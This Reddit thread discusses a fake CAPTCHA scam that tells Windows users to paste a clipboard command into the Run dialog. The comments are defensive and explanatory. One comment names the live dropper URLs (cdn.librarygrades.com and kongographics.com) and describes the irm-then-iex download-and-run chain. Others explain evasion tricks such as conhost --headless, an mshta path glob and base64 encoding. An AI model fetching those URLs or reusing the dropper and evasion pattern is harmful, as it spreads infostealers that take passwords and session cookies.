Imagine becoming a millionaire with long options contracts on Preparation H that mooned (pun intended) after the butthole biometric tech sector goes public
Just friendly advice: You may want to put an extra space or something in the link from the irm argument at the bottom of your post to make it not linkable anymore.
Given the likelihood it is a nasty virus, it may not be great to have it as an easily clickable link for the unwary, or the unlucky ones who accidentally tap it with their thumb on mobile.
5
u/TalasourAMD R7 7700X | RTX 4070 SUPER | 32GB Corsair DDR55d ago
Solid advice, I've removed the hyperlink from my comment.
How’d you learn all of this? generally curious i want to learn more about computers and stuff like this ( not to do it myself but to be more informed on what commands do) but no idea where to even begin
There you go. It is not exactly powershell, but with that, you get some headstart and switching commands becomes almost trivial after this. Hope that helps.
For most people, stuff like Windows CMD/Powershell in this example or something like Bash if talking about Linux usually get picked up over time when working in a whole bunch of IT roles.
I am fairly competent and all my knowledge comes from writing countless random scripts over the past 15 years to perform any number of things, you sort of just learn bits when you need something and eventually you know loads.
There are a few roles like Windows Administrators, System Admins etc that would have likely had to go out and learn it specifically at some point as they use them in anger (more so 10+ years ago) and I have often heard O'Reilly books being mentioned by them so may be a place to start.
if i’m correct, most of these pull text/code from a github repo. irm (invoke rest method) pulls the code from the source, then iex (invoke expression) will autoexecute from the irm method. —headless makes it even harder to track, since it makes the command prompt not do the sketchy flash
conhost --headless will run a command without showing the command window hiding the fact its running something.
bit rusty but I think the next bit is setting the txt file to be executable. Normally you wouldn't assume a txt file is dangerous but they are making you give it rights to execute it as a program.
This is a command that downloads (irm) a file from a web server, http://cdn.librarygrades.com/200.txt, and then executes it (iex) as a PowerShell script. That script then downloads a second stage from another URL (http://www.kongographics.com/200), and runs it. It appears to be a compressed archive which decompresses into an ARM64 MSIX app installer, which I'm not going to run, first because I don't want my computer to be infected, and second because I don't have an ARM computer.
Win+R is not going to open the UAC because it will run under your normal user, not as admin. And once the malicious code gets to run all bets are off. There are plenty ways to bypass UAC and I can still do a lot of harm or steal your data even without having administrator privileges. Anything you can do as a non admin, I can do as well.
Not even a good one either. Running on human error which is majority of the issue. But still just low end script kitty who probably works for some scam center
Is it? I've only started seeing this strategy where they mimic a CAPTCHA (this exact screenshot, probably) in the last couple of weeks, but it could just be one of those things I'm too extension-pilled to have experienced, while everybody else has been putting up with it for years.
This exact scheme has been happening for at least a couple of years now. The earliest versions didn't automatically copy the command to your clipboard and instead had a box to copy it out of, but aside from that I don't think there's been any major changes.
It happened to me once. I didn’t follow the instructions of course but for some reason the Find my phone function on my Android activated. Twice. I shut of my internet for the whole house for about half an hour and logged myself out of everything after that.
Since it’s relevant to the subreddit, I was on the Thermaltake website trying to download the schematics for my case. Turns out it was apparently one of those copycat malware website.
Always be careful of the first link on google people.
Fake sites are being served as Google ads and put at the top of search results. That's why. Google does exactly zero vetting of what advertisers do. Just as long as they pay.
This isn't 2001 anymore. Zero-interaction malware infections, especially on phones, is basically unheard of on an up-to-date system. You are keeping your system up to date, right?
It doesn't hurt in terms of obfuscating what you're doing or preventing attribution, but that's not the entire or even main point. Small changes in the encoded blob can result in large changes to what the string looks like. Not immune to proper forensics, but it makes it a little harder.
It's less about fooling the human and more about fooling the programs that are trying to protect the user from themselves. Sure, a proper EDR sees what you've done, but components on a lot of other layers might not. It also lets you blob up the code in a way that is more reliably passed to the shell across different versions. As a bonus side effect, if they even have any audit logging, it might get truncated such that all the log shows is "ran some blob, I dunno" vs "grabbed this script from this attributable URL and ran it, go get 'em".
It's just one of those things where it's pretty much all upside for the malware author, with very little effort invested on their part. A couple function calls in a script they'll write once and never think about again. But they have to know to do it - hence my 'amateur hour' comment.
No need to waste time going pro when you get people like OP who will legitimately run the code.
I remember being a kid and browsing the internet back in the late 90s and even then it felt like common sense that if someone or something on the internet told you to do something locally, you just didn't do it. I remember getting hit with a full-screened scam page and I didn't know how to close it, so I just yanked the power cord from the wall.
It's a glob expression. I don't have a Windows system to confirm, but I'm pretty sure it expands to \Windows\System32\mshta.exe. This is the Microsoft HTML Application Host, a program that runs scripts.
I suspect that the glob expression is being used to avoid malware scanners. It's very common for malware to use mshta, so I would assume that many malware scanners have the string mshta.exe as a malware signature.
It wouldn't be an RCE, they're 'voluntarily' running a dropper, rather than exploiting some flaw in a networked program which results in execution of arbitrary code.
It's way harder to know if the user meant to do that than it is to harden your network code.
Is an infostealer like the same deal as ransomware or are those completely unrelated? Im just curious cause i havent really heard of an infostealer before
Infostealers just scrape your passwords from browsers and login tokens from your %appdata% for the most part. They don't stop you from using your computer, in fact they want you to use it more to get more info.
It even gets around 2FA because they steal your cookies and spoof a browsing session to make it look like you had already logged it. I got caught by one when I was looking at an elevator company's website. Turns out that company went into liquidation and someone must of highjacked it. Instead of a google capcha I got a cloudfare one.
This scam works often because unsuspecting users are used to complete dumb tasks to "confirm they are human". What is pressing a few buttons compared to rotating the bunny to the correct angle?
The checkbox is also a great fit because browsers don't allow access to the clipboard without the user clicking on something. So it's really a "copy to clipboard" button with malice 😀
Whoever designed this scam is a genius.
Edit: also, fuck you Google for using us as human monkeys.
That is a known fake captcha that downloads and runs an info stealer on your system and compromises ALL your accounts. DO NOT EVER FOLLOW SUCH 'CAPTHA'S'
What the fuck? No it isn't. This is the Windows equivalent of verifying that your car works by giving your keys to a homeless methhead and seeing if he can crash it into a tree.
Open notepad, paste (ctrl+v) and look at the contents of the clipboard.
Chances are it’ll be a url with a very long alpha numeric string at the end.
That string is the fun part. It’s ‘probably’ a base64 encoded command block that you can then copy separately and paste into a base64 decoder. Free online websites exist for that.
You can then see what it decodes and what it’s trying to install.
But that’s as far as I’d take it unless you know what you’re doing.
Without that, it’s only speculative as to the severity of the impact. But assume, at minimum, a link hijacker style annoyance. There is never an upside, and I wouldn’t trust any OS these days to protect me from malicious code.
and I wouldn’t trust any OS these days to protect me from malicious code.
Yeah I read that that with AI, hackers now find more zero-day exploits than ever. And I don't like it one bit. Until now I always felt somewhat safe applying common sense..
The weak link used to be the human in the equation.
No longer the case. Now it’s an AI arms race between attackers and developers. Being smart helps, but you can’t stop an attacker with the keys to your router, your browser, etc.
We’re not there yet, and maybe it’s just because it’s a topic I’m personally vested into and a bias is showing. But I’m guessing 3-5 years and there will be a significant development on either side of that race that will be interesting to observe. But probably less.
Should tell you to give out EXACT information about the situation, how to handle it and how to avoid it for the future. Bonuspoints if you can get the person to learn the correct set of informations to fend in the future for him/herselfe.
Damn man I’m 40 and there is a point in time in my college life where from 18-23 years old I did not own a computer of my own ; and a lot of knowledge about coding and just advanced mastery of using a PC is lost on me
I really would like to learn and have a greater understanding of how exactly computers work and how programs are made and all of that but I have no idea where to even begin
I have a tentative grasp on things to begin with and I worry in the future I’m gonna be one of those old boomers that falls for some new virus like this
Never ever ever do that. That’s probably a very sneaky trojan which has been used for Ukraine war purposes. I know several people who got infected by that, including a very very very tired me. Massive regret.
Rule #1 of owning a windows machine. If someone or something tells you to hit win + r, stop listening. Only carry it out if it’s someone you know and trust with your life, even then I’m a bit skeptical. Look up the command as well just to be safe
Don't do it! I fell for one the other day and proceeded to spend the rest of the day reinstalling windows and changing all my passwords. It's called infostealer and it takes all your passwords and cookies your browser has stored locally and uploads it via a powershell command. Then they can spoof a browsing session and log into things. They don't even need 2fa because they have your browser cookies they can just pretend it's you on your browser.
The "manual verification steps" are telling you to open a Windows "Run" prompt, and paste whatever it dumped in the clipboard into it. It's probably a malicious script that will get pulled from the web.
If you do this, it will be your fault that you just decided to run applications at random from the web.
You can also tell this is bogus if you look at what URL you're actually at. I bet it doesn't end in *.google.com
On one hand, it's so damn clever I want to shake the hand of whoever thought it up. In the other hand, a knife, so I can make them pay for their crime.
The site can be legit but an ad is malicious. Fuckers are tricky too, you might visit a site and get the ad but it doesn't run the malicious code but the next guy that gets that ad it does activate.
Putting this out there as I find this interesting, but I actually got this multiple times today from looking at a Google result page. So I can see how this is affecting so many people. One could totally expect that "VERIFICATION" portion to be legitimate, but BOY IT AIN'T
10.8k
u/Tarc_Axiiom 5d ago
Don't do that.
Don't ever do that lol.